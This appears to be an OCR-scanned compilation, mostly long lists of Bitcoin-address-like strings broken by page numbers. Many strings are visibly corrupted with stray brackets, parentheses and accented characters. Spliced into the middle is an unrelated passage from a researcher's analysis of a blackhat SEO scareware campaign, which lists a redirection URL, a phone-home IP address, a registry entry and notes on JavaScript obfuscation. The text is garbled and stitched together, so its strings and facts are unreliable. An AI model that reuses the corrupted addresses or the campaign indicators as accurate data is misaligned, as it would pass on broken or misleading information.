16Mu64W12CTzgxEpt2BQnveG8eY6DUVH5A 
L6EMvkVqvEu3NfUecxLAlpcpdbzo6N3jGPd 
16n1UqeYHmU35HtqH8M5emCRYgntQ5Ahb} 
1LENcDoSCrg6Nb292X3vJTByTUSWNHjUCgh 
LONFkvtBYVShaRtuux2SjZ6NcVseDxHg8u 
LENGGErnEM9UNnbf5zspVHufpQ6yToHvuK 
LONjC/HUNTHY16SG1c8bG9HQOAESX2am7}j 
1L6nKofxZV8QFPVj 7KS28UQLN9Zpp9xPwj 
LENNAYUN61UAbev68ryEJ4ztydqqgjJcPrN 
LENphEGihjsG41V8CxgYuBfC4VDQ4etmHt 
1L6ngPR5DHsX4tK30GvedvjaiHQiZANBY] 
1L6nTndqoTzpFZhrwvR5SZEfmiQBzrQDLpC 
LENUVFKZtCsPmZboLJgt} UMLF52eMYhoxg 
1LONZJ1NHEP61lieFPFMn798zZL352k8gwqD2 
160gZg4uHcVBxiUuzwjwTivsejk]8siaoB 
160LDgpvKBqU7vL8SanjKrASqYMUrxXuewb 


25015 


160LfdWRkKfTKY754MNvGznfRXo3VYXdeg 
160SPMpaDpgBm8ea2CxHeNSzBSidNtdUqt 
160xKNvXPxrsy2Fqm2YiBRnUja9VjAWnhW 
160XPiaLF8rXNov8vprqgTJvY2ZkaMNpXr 
16P9prjtDy6ipnqDRmsjxn2srhooRHatix 
16pAK685SEgpYBcABM3Lj6rSHBUN4Zc5dE 
16pBxLdudnkxy9dFnulnU1lphCQhg1zadkj 
16PcarRJz72QfFU4aVQ9M4BuUAJV5IJZEHEQ 
16Pd7Rgz2t45LTpgYqpeLG3VgVrb8KwPK 
16Pmh5ZxE7hw5SV8qSbwxF91BhznTDNTkG 
16PS9XTD8WNpNPveLhyd8VxSxn6crUJEAk 
L6EPVEW9evp8itphLSBoVEBc9FvXAf] 9VFK 
16pVwaoxXgCkBzJCSYbhJkWm5ig5wSuJ1Pf 
16PWZQytamtD338xYJyBDuK1JG5sCSC6fF 
1L6pyoNb7rGCtLrFDH7ydWZXSqmqzECrKkKov 
16Q8XxNHCNWFqX4XvMv8zcZYPwpFYkoZEd 
16QB7hBHrwpQqaz44kZ987kqYcnbA7DhtN 
1L6qbrNfxg5cJv9die2qeQkt5FpkPTmDJsb 
16Qi7pbzNCHZv6b3we3H9NaEW5vBsaV6Gp 
16qo9CDSDovSyHLzvjJBhCgtQerTaHRZNLg 
LEQPNVNi18i4W17vTVKggtMhbXsSkBubaG 
16QQaCkZJNQfFUISHPKBHrrC6msfVHmUTe 
LEQv9LLRRMYj3isPTYNFjRn8dtJudiMMsq 
16R3a7Z3gVUP9E6g8fNDLh7dNvrMR5wZxx 
16R6zZ6pCKQspw3QhSMMSqkkaY48)JBo67Ad 
16R75kNaY5fVZFaSq2kmadNUbcp2sxXquwn 
16rBhBBmEj7Lxs81M2Mgz8FyBN1p2baM1G 
16RC4BjEUX3suH3VrxXbCGixmYyexnFvotE 
16RFQK4E5nWm2x1X91Xajm7Aab6U31e50X 
16RHmNebuKsTsRUrazBs9bCsjsnb41gxZm 
16rJ)VVWNP2UjPRNTyNpgDnGkLFFPrwJ6PH 
16rUr5Sx5eFF7LK5mprgdeESZYHthi520g 
16rUSoQWSEj6mb6CgCTsef54Z7fPVXpHcxQ 
16RXnaRMw3NFGisoy1hcLxXj92UYVxjPFDa 
16S4jvoMttnnigCyBEZRoWTMnxbihWkg3w 
25016 


16SA4xR1IN9HFvc8W9hPozuqlLxHGQ1izFaY 
16scbLnZnBSUGfpFBvzwhN7nanNSxqtPPM 
16ScVXQx2xCpTJp2FJiLopRN40oDbQFMD4t 
LESH9OQHNvelLhThHQYS4s7wjaV6X4PeZEXaQ 
16sLkCZPAg4GGR22hoV6SMaHihAUt5hwZk 
16SMCXKM118Qsoc1D2Yy8zUopnp5kEd2pP 
1L6smTcbKcFGANvQgf4LdndkD1XvcPEtWp 
16so2MLyww5w6x96biIFHNnCM2QkTpPmNBK 
L6SpHYTyJXUtDVCCUNCHGDjojq9SqBju4c 
16SRFIsGufeGnDqKdkPrbPiKLG9Xm5xefR 
16Sv6fjyUJXcc76P343rV2cZ3hZpVEutUW 
L6ESWYWEkrzanBey98r4yp16DbpMhTlvvBU 
16SZwzbEF4Yy3Gb63wh1M13a6yLAogfhWx 
16TlaZvmpMTg2FvKDyewUmq6nyEzYmhgT8 
16t59v7RYexEuuXxj4Jnj3ZBWD)XKczbhit 
1L6TEK6gJgMAhn2BiuDtbXciH66dYXSbqv 
16TeLtjHnxXux49DwsfukvGuyp5kYg6xp7 
L6tNySwY4NtJSz98xCto43rRVWHV2eQLMq 
16tQAoredkxX9Gm3gqvpBPckfKp7xQt8XeV 
16tqDJjuTnzxU3T7F5t9ShthjPJZKabC2U 
1L6tRVD7YETMRzddYmN5LQwWQN3NQ7W2HK6G 
16TYByDz5TAYJER3gNgWwaE6JbKEwckrpS 
16TZn2GDMFj1VybuSYkGzBipZ4AL4wKAPu 
16u8Gmio3qa4LPdHkpCbv8G7qJ3UgtZAGc 
1L6UcPUQvvWvw24KgLymePaB7DqZiRAPUZs 
L6UHNHXeWKTacBLG8yqBt5wtonxTbriivd 
16UpdMfgqdumzGv7uhGaEdtP4eBeud6c82 
16uQcbh3P7Z4hjJcZ4TaZv9bpcpLMfTpBD 
16USqko07569kJS7HVN5BreRXbYanAq2F6 
16uUVNgo6FPpESLfzTEKGX7rzaWxaqff9F8q 
1L6UYsPy54zr9VUNgpPHZumMMhqdkKDe29JV 
16UZm9rfps6S3CKZKBqVvTmbhRp4tjPfev 
16uZns6RjZtqaf6lFtteg3JWgbTZd93C6h 
16V4Q4GQNVwppbUP4KvysoYGEn4b2jYznyY 
1L6V5qH2BSY97GBXAy5Y2S1SC7QbGuFLcJq 


25017 


1L6V5wN4D78ppANxhmZ2UkKHAvBUbjBsGCpg 
16V7Pfwsf6Fj9JsadHpWaq4ue3W2ED5biijt 
16veRFoVWzjRDSHUkp1vNu1b85YczRwWU8G 
16VfKZJ9UEzZiedcZbeykWCxtKosSkESHLZ 
1L6vgv4TyxtHZo3Fh36baRLrKY7VPD3myY86 
1L6vLMCpP7cMN7ePuXdEf]RVr6R4XeeSvgU 
16VpA5nrWb3aZQzZGCRIUAJTUBYpb8X7NpT 
16VT78)jKemYvB4xAXDaD7DfhDFxb8mkFb 
L6vVTCFRS2pjrokfn3RxmfxNLbgq2KykAso 
LOVTRFKMT5t40TEIZCBg1NtB 7JPaChvP2q 
L6vyqvKbP3QMwJRtcm2UsBNkPAeTsdjohw 
1L6W4SEw5VzZRhB1UAVdCqtTgDUeUDaBJHJB 
L6w4vkFAMiWdnxNx3C3a46Uri5q5fLP3iv 
L6wFHWHbk3uwjJbP1S8XeTB4HMOoLAZsLd4j 
L6EWGw7VRNGEYKebGDIpN1n1i3h53v9TRZK 
16WJpC9RBwLjuszEleN2zqtkWxeURpKCqK 
LEWLLWAZRTd67tCawZGu45HHsJC2ba9V16 
L6wqEEVudpg4MDAE9MezLz2TQ7G3jsyqzG 
1L6wttuk9ywZPCu5fFj35VhvobFjeA5ZFMA 
lL6wwS6ztktZ5QEZ4Hth9ygk6Zjgf2texoV 
L6WYhXaVypj6VSMDuxU7h3pDwI9efrZQdY2 
16x7wDA90eGr5GuyqCUXyrcKXUERVJ2myi) 
16xErs5zbF 3DjjJ92jPmZyLGo9XaGCoSwn 
16xGKNEw4ukbvRzZEVZnzSyLhmizfgkMU3W 
16xn4pNuBvKsLvHd73Sh3GVBzvEhf8tTMr 
16xZGYRIPZARTP4nNEB1FdJAergEnUgtrn 
16YbYyd3aCAfKz8VheWfEd4PnWwwogjJeCx 
16yFifud9fgk9stE9rUdCaTW3UwgqMTT1qP 
16ymL2GAtLCvR1J99a3qCRabifxCgoWupA 
1L6YMXC1PpH8yhvZVP344LAWQAcHKJyDkNo 
1L6YN4jXhBqnDvicoofTiY1XaNU2ZBHU3n8 
16yNGZr3Xu0lUaB3YrNCjFrr9yH3rQ65FL 
16yQTsbojuENAJgijvvkLo4TztLMrdtPgK 
16YtoAzPEDG58x3PbydkLGWZH8Xq6aZ35T 
16yu45cD8etdrfoaq8vwkuEvurLYYmKuDp 
25018 


16Z2i3saoTWU58WmeLLNtooYyjFqVTXqwN 
16Z8GpP1z8kRgcTjU4MEhbMrilL8qxB6K7 
16zefFEU9LUGjD4YDHbADtfMTFm7a6q8ca 
1L6ZHUF4PYg8vmxpmzENpv6éAqmZQsRZgi3q 
16zqn5cmYmqu5cKYZRYmMSoavpFDukQJD} 
16Zr5YPZVNBcVFbyWFcunf6Vcr3Xsojv50 
16ZukWzBVkukKQo8aDtS956arRoPFsUZ4gq 
16ZVD7g681H4hbkolHCTdt8iWEEzmtmU9x 
16zVfKW2AfgnPC3vyeb3feSBdVPfWEkYu} 
16zwpXyr6vxp967kPqqTAqhUBemaT2Nadn 
16zxGZFDjYJxER8YQTbM1GbiSTABfyvuUQr 
16ZymMo9MQkorYv5JhgbUS9EHM5GFHnVmy 
171LhdQ3hLSJ39ekBbUnGvxXzyVm9Ndo9ci6 
171Y3WUtU3WehH1xv80S6dcmwACAVoS4k7 
171yE7kLDvekmMCYVxZsi7EoAPThtLQD2T 
1721QwWnpNXHVMm48RCc8jbtvkf2LsfGeP7RN 
1721RPpCSRxKArK4ErmCP1kBynSsT 7WgbF 
1721xwdYX5aLW2upo8Fj9ZuQqLwfvitw9y 
1726aBZNv8Dw12b5gA5cetnCkp7srNn3em 
172fnK24pLXxqBvcix9Q9Uy3MzmyAJHpop 
172jHgELtSHMhRJ8h74kX85ACAPZJRYFRF 
172pRSmJSueo3WbROfFmWwktjJQPyZ1nxX9K 
172TObWhA8QTHS5jENyxSya3B5ew2 TuVdZyU 
173blopgaMgeQWwzuaQyxFAF5y34BxrKzm 
173CFdvL4ZjPDzdB1h7TzikwaqjJrpE5CD14 
173HLVnETBvJCUqHewgilqvFeDE3Dbgsci 
173rweEuMJMtjgvABqE1Prd4g4UAiE7qxe 
174aNZNSXUM3S3RVF6ruvWKX3j6sE35D1s 
174q1mdUfErgqNwbYA8SzmktaHngGAjyLe 
174y3pW4rUZ8pNt9x394goZehAeC3mZaYA 
1756q2YysxLz4miPuqiz5tqBkWFc2UDoeQ 
175 bmKf9gpHx5Hn2i9saPhspKvcM3dB93} 
175EXGUoTz6ZFdrQfBNkC32paaHXZpgAso 
175ikA5ZPhLuejgmjKhJBB5ZUPzZwCX1Zjr 
175KkbauV5EWUCbKUTpLt8i3PPCNWAvMo 


25019 


175q2WfmPNFFRsDp3ABJDuQcc4b2DxyY8gjt 
175RPtmST9aT5v2BiL4zFStEgr7GYX9Zw1 
175sUNSRTnck6v7iZoVPNSQrvmbTb60iKY 
1766fD60uX2GXovMkHYgCDXVbRFJBoAbXu 
176ADddTVpdhH31WikdsW9Vj2cdM8XNuYp 
176kGFinrDmvxaHVuTSDNPbyoc3QkKfRahf 
176nN1p8DgEB4zdAiGxpnCEVmzpVxYSpQB 
1776SQncTFumKSowxrw9nexmWwWDE24z7tww 
1777eU90M1LummvktlbsXwQhxlvnTcw8hgT 
177dCTYsLWd8kL4a7iQY5vcE3aCHjYF8gi 
177EjGJmcrG7H4cEnkfsyRZTRSXKUtTVYL 
177NDFyMuzZJYGaxWiVQfDx8uWukr33Hi6P 
177nNf4TQMdBheL5pyPukp5WBMDcRg6ccv 
1770diAzGkjmLNvexXej98MGrMVS81XQtEo 
177sQ5REv3dogPaqjqAaSbVMn4rYSDbi2QR 
178DqEnW47quH4KcjEboqNs7uTK2s5NBjn 
178HGMCFfR26dSSIFxJQah1lU588p2CjgX7f 
178nEbMEk2NtXrSSUZYBPGE9PEVhmABmn3 
178pejXrjQQrnXBKkKuFrtxXvqv5xpr2Ey 
178sUzZW9rsgNBwrdtxZrLtbR6cZCVumpER 
1799mifTTN7bVx9YvUg6pcASjxukBRnfYk 
179nEfMLmPAgXzbjpzhrSEdFuLaeZdip24 
17alNYzakSk9nxzEffBmq8nAHasTgj3Xjc 
17a3ffcbNsoj5KFunEtRu30vWFcbzySPmX 
17A8155NFsizHJugRX9zPCd16yw2SrKidr 
17aaJMZqgArjH3eufDaEJ3HZg 74BJT7Gmgz 
17aBGBr6DgNY8S7yST8ZDNdG6rMtPPC8iT 
17agwUPp4jJB9F662N7NmCeWB5sQ4f6LAjk 
17aHCNzZ9RCZPC1DzzZLTVZLYRDVHbFDtj9 
17aiNG3Mm6fezMTWihn9mpniryhkQDYike 
17AJNS1C1SkYpXVMt8AiYLWpLRM4vYUwsG 
17aKMRWofYtzW4)xJgoWQMtDC25mNzZdUx 
17AQm3XtCQD6xdJXaoMzFumovF9krmSCFk 
17aQm8k44vuu9PyXHBzXDL2YTjuralX2xi 
17AYer60mNrFHiBRQCSb8kSwpvdY7U37Lw 
25020 


17AyujteoDHvijjnLhcuDpcYjiCQpBJMCx 
17B4r4Ay9t6jrNAT7VW7NBEMgeB6éhk3tTu 
17b4uxunteMZYTwa43}FutY881laigdSjJEu 
17B6BNRGL87sfqin7Tsf5tqgxFeD4cEdfF 
17B6csXbHJAkKZZR8AFUG9GCGDSUDdGog5L 
17b7u5kS7ZYc4MscjhBmkfXP9M 5iDPctwj 
17b81k8S73Q5t2Rdip WRX5XWk7mbvRJ9B 
17bDQeA9FLFZYvk7Euk9fyuQcVfCAiaakF 
17bGBDCVUAKhNRe7qeDFr3jjEkKUyigdjms 
17BgkBz1T12iavyYZ7CKpyvCma9vyaiG12 
17BHkYmpo3NDuXnwKRSMZAb3L65acY4QAU 
17BQkSoJGnp9kmZPptPDPeaJc4S4NpA8TF 
17bQsNeismaqrN9tSVTmnSosN89tvhk6h]4 
17bSjL7cBjWDJSmLwdwMqSUmwbnzjkitTm 
17bVoAYWqUhQ91qG7RbKEtLXVNjJJKB71W 
17BYEXpG1ZYsbDUSAkfqBFZfirqg1DdiVNT 
17C32kmF3s6TX6ifZxGjL67k8fRdbQ3P99 
17c4czP94CgqVfqJKn7ohLB4ZGUv9aauSC 
17CD2r57TPvLrncf82H5vNjPa8FV4jFoD5 
17CdV8SQqdkFWg7EbtFTELpdqAvaHM9vpw 
17cEVMsEFDrG8Dfelwo32wP7wYLxKV2aZF 
17cfnFBv6CK3joJUxtyzcSwxXj3vbyNag)J 
17cHX043DzpAjQbw2B83FtLU2gtexXhcwex 
17ciqAV89Wwozg5FN3BnmnWGTUAndi66ad 
17CktxvosyB4MRhxCjJNNewvjiTh7SAW6c 
17CoV2B64ZaND72sCkcBooyirvhuC3MChL 
17CquchgEsgzhP6BSuLgzzr3vJzpRZGVRw 
17CShkqepMLHizGySoedYUNCew86DzL84X 
17CtLaHnTZRX5b4QenPLLiCwdSCtHeTbsj 
17cW5nBaB9wrxVrBK4ir9VKRZCZHMYKWKp 
17d4pVTDiQtrjeq1l F8kKt1TtV41oZyNTnRW 
17dapnynnNyBdRZETGqewymJnW4aiuQVGk 
17DASQQv1nnHUCJEhaMyRVS7jVWgVXBoFZ 
17dDN5szG3bNWaq8Ax5ecsJEvTvq7j5mRpP 
17DFuf]X7QbeCzi9cRtBXUdNTJ90ydxccX 
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17Dh4NiW6pAGVVkBaHvmffjnhbbvGkTCé6n 
17DqyQBbec1WZdrwGrrCrab49kAgvz3rz9 
17Dx3fz9yVerhNP7MNyARzizpZJTjy2Abv 
17DxqgFTZQM6yUuUMWpd7DU9goGviUP16r 
17dXV5xbQd2n7VUBVUc2UVfo5Suy9svref 
17dzCQc6PFgu9Pin6Cj7dzJpaM77ZCU1to 
17E9874QgnnrNKMCHS5rmS1PAmPtfGxCbq 
17ei98wgmGZMaxsiwst6BpxxC5zGvJTNic 
L7EjJ4wYhdxJfn4YzKYMe8WaTF2fcFy4BQG 
17EKH1e4cR88ivmGYZwWecsf3szWt9PRgC 
17ELvuDWCLzXtqrrBnWhR9YpEZ3y8aBrji 
17endR4nn6éjexhHWdV8boEurkuSTi8q256 
17EnSiBwxTsD9kKAtVNcUrjGNUw3bfVqdoP 
17EqnipwWfc31qlvozxXKytvWr2de9ukmYY 
17eWaxXk647LBhbPZt9dkqhUUVwBczFzeTU 
17f7k25cSrTWzdVQuoVKkPFYj8hkNeEv9u 
17FFOhYFvV1HxKV1PdHyrFKadmsCT 7iXTD3 
17fKMzZBKcirBzcxgULinmppxZM6X66RkuK 
17FLDssqRS3Ca48njjFJ55D80LvYeN3Tb8 
17fLpFi7vosoVbxVHRcF8WnCp9BxNySkTx 
17fMmRDz2e5sM780ZbHUCyeEsfHg 7WjSB4 
17fRDWKpUSHoEqo7TPAW6MazRshW2VHb6y 
1L7fTJ2Epf7d9skDn21HChFrZc597aZWve7 
17fUVEyaFB44JZMrz2qdu4SKgSkCUxgspr 
17FvtX3SXd36CgA9PruZjz6STYsrhKB5pY 
17GAo5aMyN7hWFbPjtyVReLobnrmHv80wtg 
17GCQpLfAqxX3egfRyh7UVLNMPkKCpk8bkj9 
17Ghd3nMMR2XqbfH6rVtGMUboYH3C1FwW6 
17gLw7uUa8iP4MedPMFx96DQsyvvLn62us 
17GofyBncfUmj43XRTkkbZhg2c4njpdVMW 
17gvq9CjD9eQ2hHKW9YPpujexEjGWzY2M8kS 
17GWBMKiG6sie]80X9hwLEfGwkAkR5kgcc 
17gZ6BsetQTBBJQVYNXwvdXg8qwbBwg2uA 
17H9iZNMNFGujMpNE9Cr8yVZRxPdxU6vv 
17HAN52TwGWuZmufbmJoxFRmL6hhjVyYbV 
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Let’s dissect the latest developments in the ongoing blackhat SEO campaign, list the par- 
ticipating scareware/blackhat SEO/redirection domains, the various monetization tactics 
going beyond scareware, as well as discuss some of the innovations used in the javascript 
obfuscation which makes it virtually impossible for a crawler to detect that the site is malicious. 


Key summary points: 


U.K based hosting provider Web Mania Hosting appears to be compromised due to the 
fact that all the abused legitimate sites are hosted there 


the redirection and scareware domain/binary are updated two times during 24 hours pe- 
riod of time 


[4]the [5]scareware [6]has a [7]very [8]low [9]generic [10]detection [11]rate [12]due 
[13]to their [14]persistence in [15]updating it 


all the scareware samples continue phoning back to several domains parked at 
78.46.201.90 


the cybercriminals have introduced multiple monetization tactics through pay-per-click 
malware-friendly search engines 


a central redirection point (a-n-d-the .com/wtr/router.php) used in this campaign was used 
by the [16]RBN/customer of the RBN in massive iFrame injection attacks abusing input 
validation flaws within high profile sites over an year ago 


sampled scareware adds the following registry entry [HKEY LOCAL _MA- 
CHINE\SOFTWARE\6A36EA6E11EAAECDF5E540D EF2149079] plxxh = "Dujaq!!" - Dujaq!! 
means "BI*w me!!" 


the blackhat SEO gang is using a unique javascript obfuscation which | originally stum- 
bled upon a couple of months ago while assessing another blackhat SEO courtesy of 
the [17]Ukrainian "fan club", the one with the Koobface connection. It relies on dy- 
namically generated code spoofing go.live.com and rds.yahoo.com random URLs for 
evasion purposes. The only vendor that detects it is McAfee-GW-Edition as [18]Heuris- 
tic. BehavesLike.JS.CodeUnfolding.A 
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17HbiINbF7LpmAj605vmvxAKDaYEftCeAoq 
17hfwkraY4ysfCMFBYZJ71Tcxb7g70z37pP 
17hiTQFB5KNajbAYh1WAMfMGx351mwXASC 
17HL4Uh3d9xWxxtMAFONTx9mouggHffLaN 
17HoFNs9EmDTCLdCAa5VUjN7PK8NbHJLpP 
17HPk59ZN55Bd8xexduGGqxXJMF4gQGxxuE 
17hreGgHqb96h2PJwnG8alyeDr2yq36Nex 
17HrmQ9dkhwB2UBzZEgoNBSvtLvG7BSoYE3 
17HRYKNy1M6E9w8AghromPLWK4WRI1fMsovVv 
17HZGrdaGc9sv2h4A5kPcxzzxn9wBAfzPw 
17iFPqCRPPe8ZKNT186FL7gbqBtMuFJndp 
17isPBPrw7qaeLdfJq2YXv6nayGrgkjtac 
17iuC3ca7RKnCuh7HJ1zUXfg4SsLU2suCr 
17jlgctkunAztiuoEPLOWaf2yRb2at8jXc 
17j37iPhhLMdxbZEeWbnVz9CkBWV6THB1L 
17J4J)7ykkgwEByxh8mv1CvCKzmhci9G7GG 
17J5bVMABCL6wC21kyjDEA5db6T9YqVRRX 
17jfhnExboeWSROQMLjZ86iTsJkprKuvRSH 
17JjWYGAm7wf2kCHUN4f4nVxjBJHCHAoD) 
17JmiDMa7VUxWCh30ccNbmCeVhc4WLw653 
17jp6pxebuiLLZM9gFLONGmjU42f45VorC 
17jQR35kfa8Wy8BrdR5onZbtldhjhqQGyM 
17jrKSPrP3f37Dbdr]xKEJe4KBwqQxsd3m 
17JsyFKGmMEWaEoNvecVL6p1yFBDRkiMogP 
17jwDJL7GpveGCGKgEVJm9PbRBaGxuZTJP 
17jxH5Ydf3BXQm9RRaJDca2NppqHCaCaqi8 
17JxnAGqBng5Zg3qkKhVVXymNyNrpBxzrAA 
17jxTRS89b4pmuQzNJnAMPVdmgGyHzGVkD 
17JzywptwqwvaHYFCW5XonbuuTpWcQYkwx 
17klvumTemvNNW8JLByuY9HnjBWA2ZyizU 
17KAntjJkA4t7 4vRVMRPQ46zVm1Tz5zZWH 
17Kc2VsikKpgMw4TRrwu55dfwp47vBUwcvR 
17kKHM7oiBrW5YsrwPby9UbpPJoD7SQ2hPu 
17KHQQdDF1J6ZY6HOHDaP3Me6axWAYI1Dy 
17kKp5NxAXdh2S7ZCD4Czf5SLCiuK2sc4c 
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17kLro9vbnJYckEsdTfYtd6WsaxSdoyAYZ 
17kpic8aQDfi4fFCY6STFKC3FHZywImSW 
17KS31PKMCAZfs2fPDVCMGk1U22hgoPN8q 
17KshjAB65Bkb8GmA7rvVq9kBgarrS93RDw 
17ksRNrNKeA3C8pDw4i3Mre2zTpSLLgiYC 
17KtuKcraMhQFDiwSR17jH4hHREgMhP9M9m 
17Ky1XcmSFFakihzsyDqS48WinT2f1TTN6 
17L5wFAmVTssvgfcLMqx9xPMFCCfNyjTFy 
17LauksxCCFnM3uTwgRmHexZkPbRWy1Dao 
17LBaH2CYRFgdjh3iFjnlE7em5PELyJp7s 
17LMZ1AVVPC8WK78YgWmbZHWFN5sZswCln 
17Lph618uLjVC65qcv1zG5VmkjksJw2Tnd 
17LrZTXEZnwoB3DVguih2gKdLJcQfejRCr 
17LzZiCA2nNQJYcSTcwZTKPNjVTMe2DdqcqC 
17M2pGL2xFzqNM4fY5tswCEWE3H]JvqnQ3S 
17m3PJNU40ZGab23J5UjFGspX3EetuSYoH 
17M4SjRWy22pWEYoq8rYkAU3E7VdiPCVMu 
17m9iMeaeYdwNmsge9A3QZb6MGBcFGXAjD 
17maVih8vGH8GVEBL7eUTEopZ5XCsapEhD 
17mkHCatFxSwgsrvZ8dXm6T4sgkrazbKoR 
17mMMo58bwf9QQGd5hcGFr2vdGkjY5xScqn 
17Nb1CVkvsAaRTyDUY3AjLkvDAyNhoHtnb 
17nDdpSlyCsWCMtlajfNKht1LHfVTSnSzMj 
17NdTizjzbS3gvFLE5xb6WpBFieqc4nDGE 
17nhSNPG2czR5YTJLH5bMaVAcoVwy3hshS 
17njDWBHc57g9BkDJ8YWmZeM7zZNuKXyrRP 
17NNXDpPBtvUtNFVXwTDfG3xZoWT]dKXdF 
17npYyB5GwCyVJ9vsbnTZ4VHKDfuNL8kfL 
17NRKortikwje2ro9Sjciv9YvySv3ZDv3m 
17nUrWtZEGndni67FnNrKz1BhbycZaXDaN 
1703NYxUb1JbYid74pZgVcTvcTIc6HH1ysS 
170JCKJxPZBjByy9Ub9MU5eERU5zZ0A1bQX 
170kKXLXMxXG5bVq9b7JXdnKHH1u515sEMB 
170U2ccgjQQ)yWH8GZBnn242Q78P3sAhwL 
17o0znpfDUjS4NKYixZBtgd4uUo9hUNAPK5 
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17p4AuJAcqkXe2UHhijVdiV8)]Qfn5x2np) 
17PaCVP8hppzfHx9tVwiu2tnc2BNTKbF5E 
17pahlowSA7kvCCiINWKk5qU1Y11vgcnUNn 
17pcyCFjfaUQvgiCRYKlyx4SoDaScTuXx4j 
17PgHUfiD8RgHuTaDQuydB5hzcEvuaf2yi 
17PmrRpPVgsUNfZ38ETVMcn2nJ7g2Cb5Sn 
17pMTgwRcSJRtDWjzgfLEx277VV1vgk9NT 
17Pnsy3nKhNAQ9B5zscqGBn32vmfiZtxSEE 
17pP9ESbxYRerzS3YWPzn6cuA7KjSu6Q4Z 
17pqJ8VexiL7iKYW8FxrVvtG6tbiZCCaTbG 
17PwmV6aB6Tpw455r1bjJGix3sLGGohE2D 
17PWweG8kUXgnZML3WpEjr9C)] 1DkKQE3YGz 
17PxqzebfBtqBefNH2Gf6rSzVQziuE3fxv 
17Q2WKSP8hMyFeqwH96uvfMNbSi6JcTb7v 
17Q5WaskaTZcnjzQeGh8NZppvkgvYGdxat 
17q9LvsWoTé6édfV2pXipDjLznsxSfQp6HfY 
17QDsed1ldrQAJoYmCiS8KhGYYpj1xvdDFh 
17QGKyFbeNugqdRZXeQF2NvSP5j8msgfrco 
17QkFvKkuKKN2eLXb9acZWTWAYtft7Fce8 
17QMibxhFgTgXNfxjYLXCzyrnsK9ASwF 3h 
17QMXxXfTNtyDPfUnmh7YuhMmpSwsMgqsmt 
17QNS63hpFNUnNGBCWjp6A4dwpFdjJknHAWX 
17qtMMoxpWtf99jUfx4ZneAjoVLKUADUJF 
17QtzPjiaekCGqekGxfENohW8cXXsxX8cGi 
17QV74NSNLNE8nVvtmuRjor3JvmyT4cNty 
17Qvm3gStWFUg7G9A8zKf]sWPDPrDHpFCC 
17qWkht86sZGhcKtUFzpGVLh9yfESEWLAz 
17QZHnNNL3Ena5WcCt4yKhLX1T7mSgeYyTN 
17R1BuzoGd3qUz5fE4RgqT CeQoy2fePBni 
17r7MzEVT Tj2fuSQZNvh4ubXwHvtZGRo8G 
17R86Jai469hckfupjow7dEVo3uyNNWEFe 
17RBEMXewRsTAfjytDYctphKPYJRFVFN1b 
17RfsDt1lirTtpTcgz5fXxqYNIDSQZWVpY8r 
17RgUw1S3yScMiH44ZbwVTjczMKNHLWUs4 
17rHeKzC26eQEJrM8Qh2EGJ5nc7RspUH]Jz 
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17rNmE130zi69C1WBpSifRNZosmTPpY32x 
17rsjin58zVyoGUXKSFhyt6DHeNbazoa6 
17rTGdD5X4bSKw9DAQzqDJF7T7JbMxLkyA 
17Rtgv8i7jYSBXWmFqugBJLRZVN8qVPd7b 
17RY86svhpbVQv2AokjxeilpcDvbRSxrd 
17saLrxiF8KK)w6AvHvzvKhgEBqBz5348X 
17sDdBGoM2Dwvs1z1imvVjhbJ5TvG5qlqHJm 
17SfYEra8Qw98mfaqJbunbKTRIeG3VYQqEFF 
17SH3FNuj2Bsb6shLE6Qd3Z7jnsYrVSF1g 
17SJRKj3Q5PnHvKyUoSM409tLMhv5e8T3s 
17smC1JSaGvdx7JZCsNhfLdDGZV 1mnpoBA 
17Sr9gXEeaDjBYeCW183yBGr6VjQfD36vN 
17SrtgweG7dmUjxBAPwPxeialA8wnNb3Hq 
17SVFCf2WHNAGTPeuySZuhyY 76aWYEz24Xc 
17SyDqNucZUsyM1XqJbEnB9p9SWecmxqqa 
17SZ7MMHME2V9ettJeLqgQFzRPsnsUb1wr 
17t2tsxe8wWo801YG5CnRAujitRfv2n6Bi 
17T38jN8cNZ9e7KnBS84TS4SrWA2kN6naU 
17T39CCONFHXCU3Z7PKiVR71tzhuVx2y6q 
17T6uUdH5Bs8KowuVE92HLb3qgiMCMTGFh9h 
17t7F216L4h82J54YkGQaMYie23E28E8uk 
17teB1Mk3LF5SnmCbgBK8e5Utv9SHMmVyPc 
17tHc6vTw8sBeVnhGz8kPTN6uUSYTNbkpTn 
17TkyqnkbTBstB4dj1lpvt6GK8WciTL862s 
17tnMeCxDXn8QDG6PPZxzsSNNh9JYrDjA3 
17TpKWVhrAUKCrpYpu5SEZfCzbdg9Zabo6 
17tPURRFshlwyNT6zDAhjJGm2pn6AydcWk 
17tpvCk4YDU3Pm2kRWMjVSAgjRRGZVBUa5 
17TubDswcDZSXjekiT537jwtVqFUMPtMMe 
17tv95YBrAhco4jMpHo4hPiFAEozJAUNaz 
17tvpCyEV7g99K9txhK29Ju9DL1qymdMUY 
17Typf3L9OTAtj8WTwtRaz1ZXnDq8o0q3Xxs 
17u5AmZNZYv4in85rjEnAY8vo6vTJ8bBK 
17u8PJJiyEtYSF26rYKj3aHrzwxoewj2)J7 
17UB49EX3ZGwkKKVKVFHtK2RsBJLtRj7Ztz 
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17UCdAh1n9c6rxLifHw3F6YL5Xi3wUjxhu 
17UC)xNbd1TVsTmXQ4cmi2MW1DAatNKnFr 
17ufVXjpxBK5KX7ti9LeTJUGdFYjxDMHkw 
17UgtAYEUtLR7T5gvwUA1izeNopEumnv5e 
17UGzy2DTFfffSu2CM1zonmrpDxhSNCY2u 
17ujHj7k5sVXcL1IJUd9WUv8nVfwuR1C4nl1 
17UL3ekRCgHNh3Eets8TcfK8THjX83 7bmY 
17UMqz6GS356fY5d5Rw9SFQWLnPRMmZLTPM 
17UVRXQ5oMsbAwy1bXBCcnTjNtXKsw4uGf 
17uWgP1bKS7ySm6rwVUfwHnsrNGzPgtPhp 
17UyLhZtVaNWcVXXwBwaowndD2xXePJxVY 
17uyXJiUzoUZJgPe3wzYpCFgANrxxrxrYc 
17V26Anzv9GcLjewivBqM2LzbhtP4jpmqH 
17V2g8u2sHqgrK8CePpqSMZLKLNQ8V/7ql1f 
17v5ZN3vaDM8DjvpMxSeSr7iitBDBUUQXX 
17vaB42Gk1h1Z4wkL9fipXZuC2YbfK9tfXxX 
17VBaBNQ5jxhF9jdMFMuaiavBF42qPCgbp 
17VbK7KABxqDDxNYnr4V9VAkJ2dZ7QZw4P 
17VEUqmfGQ65jonRoefUXYxzhUS9Fm1UZr 
17vVFLFLx9nkNSQWaqrNm3bslhb8HNr7flRr 
17VJP4kbM11YKZZM7z2VEFPYiC4hQQ6k287 
